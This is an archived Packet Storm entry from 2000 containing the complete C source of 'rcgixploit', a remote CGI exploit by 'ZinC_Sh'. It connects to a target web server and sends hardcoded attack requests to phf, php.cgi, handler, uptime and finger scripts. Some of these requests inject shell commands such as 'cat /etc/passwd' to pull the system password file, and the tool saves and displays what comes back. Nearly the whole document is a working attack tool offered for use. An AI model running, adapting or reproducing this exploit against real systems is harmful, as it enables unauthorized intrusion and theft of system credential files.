rcgixploit.c.txt

2000-02-16T00:00:00
ID PACKETSTORM:10477
Type packetstorm
Reporter Zinc_Sh
Modified 2000-02-16T00:00:00

Description

                                        
                                            `/*  
* DESIGNER: ZinC_Sh(C) E-Mail: zinc_sh@hotmail.com  
*  
* DATE: Mon Feb 14 15:28:19 GMT+2 2000 @601  
*  
* MADE ON: linux SLackWarE.-  
*  
* GREETINGS: Packo, BlackSouL.-  
*  
* COMPILE: gcc -o rcgix rcgixploit.c  
*  
* DESCRIPTION: Remote Cgi Exploit, looking For PHF ,PHP ,HANDLER ,UPTIME,  
* FINGER and try to Collect Useful FILES such as /etc/passwd.-  
*  
*  
* P.S. DO NOT ABUSE IT.-  
*  
* May The Poula Kapribekou Be With You...  
*/  
  
#include <stdio.h>  
#include <stdlib.h>  
#include <string.h>  
#include <errno.h>  
#include <arpa/inet.h>  
#include <sys/types.h>  
#include <sys/socket.h>  
#include <netinet/tcp.h>  
#include <netinet/ip.h>  
#include <netinet/in.h>  
#include <netdb.h>  
#include <unistd.h>  
  
#define OXO 1  
#define PORT 80  
#define STRING "200 OK"  
#define PHF "GET /cgi-bin/phf/?Qalias=X%0acat%20/etc/passwd HTTP/1.0\n\n"  
#define PHP "GET /cgi-bin/php.cgi?/etc/passwd HTTP/1.0\n\n"  
#define HANDLER "GET /cgi-bin/handler?cat%20/etc/passwd HTTP/1.0\n\n"  
#define UPTIME "GET /cgi-bin/uptime HTTP/1.0\n\n"  
#define FINGER "GET /cgi-bin/finger?root HTTP/1.0\n\n"  
  
int usage(char *ARG)  
{  
fprintf(stderr,"Usage: %s <CGI-N> <hostname> <port>.-\n",ARG);  
fprintf(stderr,"Examp: %s <2> <www.remote-machine.com> <80>.-\n\n",ARG);  
}  
  
void comm(void)  
{  
printf("-[ Remote Cgi Exploit ]- By -[ ZinC_Sh(C) ]-\n");  
}  
  
int main(int argc, char **argv)  
{  
  
struct sockaddr_in addr;  
struct hostent *rh;  
  
FILE *fd;   
char buffer[BUFSIZ];  
char for_switch;  
int result;  
int con,sock;  
int ptr;  
  
if (argc < 3 || argc > 4){  
usage(argv[0]);  
menu();  
comm();  
poula_kapribekou();  
exit(OXO);  
}  
  
if((rh=gethostbyname(argv[2])) == NULL)  
{  
perror("gethostbyname");  
exit(OXO);  
}  
  
memset(buffer,0,BUFSIZ);  
if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)  
{  
perror("Socket");  
exit(OXO);  
}  
  
if (argv[3] == NULL)  
ptr=PORT;  
else  
ptr=atoi(argv[3]);  
  
addr.sin_family = AF_INET;  
addr.sin_port = htons(ptr);  
addr.sin_addr = *((struct in_addr *)rh->h_addr);  
bzero(&(addr.sin_zero),8);  
  
if ((con=connect(sock,(struct sockaddr *)&addr, sizeof(addr))) != 0)  
{  
perror("connect");  
fprintf(stderr,"Can Not Connect To The Remote Host\n");  
exit(OXO);  
}  
  
sscanf(argv[1],"%s",&for_switch);  
result=switching(for_switch);  
  
if (result == 1)  
{  
send(sock,PHF,sizeof(PHF),0);  
recv(sock,buffer,sizeof(buffer),0);  
if ((strstr(buffer,STRING)) != 0 )  
{  
printf("\nFOUND! PHF Script on The Remote Host.-\n");  
printf("Wait, LoadInG Lynx...\n");  
fd=fopen("PHF.results","a");  
fputs(buffer,fd);  
fclose(fd);  
system("lynx PHF.results");  
} else {  
printf("\nPHF Script Not Found\n");   
}  
}  
  
if (result == 2)  
{  
send(sock,PHP,sizeof(PHP),0);  
recv(sock,buffer,sizeof(buffer),0);  
if ((strstr(buffer,STRING)) != 0 )  
{  
printf("\nFOUND! PHP Script on The Remote Host.-\n");  
printf("Wait, LoadInG Lynx...\n");  
fd=fopen("PHP.results","a");  
fputs(buffer,fd);  
fclose(fd);  
system("lynx PHP.results");  
} else {  
printf("\nPHP Script Not Found\n");  
}  
}  
  
if (result == 3)  
{  
send(sock,HANDLER,sizeof(HANDLER),0);  
recv(sock,buffer,sizeof(buffer),0);  
if ((strstr(buffer,STRING)) != 0 )  
{  
printf("\nFOUND! HANDLER Script on The Remote Host.-\n");  
printf("Wait, LoadInG Lynx...\n");  
fd=fopen("HANDLER.results","a");  
fputs(buffer,fd);  
fclose(fd);  
system("lynx HANDLER.results");  
} else {  
printf("\nHANDLER Script Not Found\n");  
}  
}  
  
if (result == 4)  
{  
send(sock,UPTIME,sizeof(UPTIME),0);  
recv(sock,buffer,sizeof(buffer),0);  
if ((strstr(buffer,STRING)) != 0 )  
{  
printf("\nFOUND! UPTIME Script on The Remote Host.-\n");  
printf("Wait, LoadInG Lynx...\n");  
fd=fopen("UPTIME.results","a");  
fputs(buffer,fd);  
fclose(fd);  
system("lynx UPTIME.results");  
} else {  
printf("\nUPTIME Script Not Found\n");  
}  
}  
  
if (result == 5)  
{  
send(sock,FINGER,sizeof(FINGER),0);  
recv(sock,buffer,sizeof(buffer),0);  
if ((strstr(buffer,STRING)) != 0 )  
{  
printf("\nFOUND! FINGER Script on The Remote Host.-\n");  
printf("Wait, LoadInG Lynx...\n");  
fd=fopen("FINGER.results","a");  
fputs(buffer,fd);  
fclose(fd);  
system("lynx FINGER.results");  
} else {  
printf("\nFINGER Script Not Found\n");  
}  
}  
  
  
close(sock);  
return 0;   
}   
  
int switching(int CMD)  
{  
switch(CMD)  
{  
case '1':{ printf ("Looking For phf Script on The Remote Machine.-\n");  
printf ("Wait...");  
return 1;  
}  
case '2':{ printf ("Looking For php Script on The Remote Machine.-\n");  
printf ("Wait...");  
return 2;  
}  
case '3':{ printf ("Looking For handler Script on The Remote Machine.-\n");  
printf ("Wait...");  
return 3;  
}  
case '4':{ printf ("Looking For uptime Script on The Remote Machine.-\n");  
printf ("Wait...");  
return 4;  
}  
case '5':{ printf ("Looking For finger Script on The Remote Machine.-\n");  
printf ("Wait...");  
return 5;  
}  
default :{ printf ("What The Fuck IS This ??? Choose a Cgi-N From The List.-\n");  
break;  
}  
}  
  
}  
  
poula_kapribekou(void)  
{  
printf("-[ May The Poula KApribekou Be With YOu... ]-\n");  
}  
  
menu(void)  
{  
printf("|N| CGIs |------------------------| DESCRIPTION |----------------------|\n");  
printf("|-|---------|-------------------------------------------------------------|\n");  
printf("|1| phf)| phf, Looking For /etc/passwd file on The Remote machine |\n");  
printf("|2| php)| PHP.cgi, Looking For /etc/passwd file on The Remote machine |\n");  
printf("|3| handler)| Handler, Looking For /etc/passwd file on The Remote machine |\n");  
printf("|4| uptime)| uptime, Looking for (Time,date,Users) on the Remote machine |\n");  
printf("|5| finger)| Finger, Execute 'finger Command' Through the Web |\n");  
printf("|-|---------|-------------------------------------------------------------|\n\n");  
}  
`